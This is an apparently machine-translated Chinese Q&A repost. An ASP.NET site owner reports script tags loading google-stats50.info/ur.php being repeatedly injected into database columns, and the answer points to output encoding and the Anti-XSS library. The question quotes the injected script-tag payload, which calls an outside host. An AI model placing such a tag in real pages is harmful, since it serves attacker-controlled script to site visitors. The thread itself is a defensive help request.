ASP.NET网站上的XSS攻击

发布时间：2020-12-16 07:02:46 所属栏目：asp.Net 来源：网络整理

导读：我遇到了很大麻烦.请帮忙！！！！！！！！！！我的网站遭到了一些恶意脚本的攻击 / title script src = http：// google-stats50.info/ur.phpu0026gt;.此脚本会自动附加到某个表的任何列.我删除了这个脚本.但几个小时后,它又重新出现在一些表格中.但这一次

我遇到了很大麻烦.请帮忙！！！！！！！！！！

我的网站遭到了一些恶意脚本的攻击< / title> < script src = http：// google-stats50.info/ur.phpu0026gt;.此脚本会自动附加到某个表的任何列.我删除了这个脚本.但几个小时后,它又重新出现在一些表格中.但这一次是< / title> < script src = http：// google-stats49.info/ur.phpu0026gt;.

我的客户抱怨脚本.使用的技术是ASP.NET 1.1,SQL SERVER 2005.

请帮忙.

提前致谢！！！！！！

解决方法

从数据库呈现文本时,可以使用两种方法来避免此脚本.

>用户Server.HtmlEncode(DataFromDatabase);
>使用具有类似功能的 Microsoft Anti-Cross dll library以及更多选项.

Last MS Anti-XSS library now是3.1.
How to using video

他们如何通过这个脚本.

>在联系或其他形式.
>在统计信息的浏览器参考上以及浏览站点时,您会记录此日志,当您查看此日志时脚本正在运行.

希望这有帮助.

（编辑：李大同）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!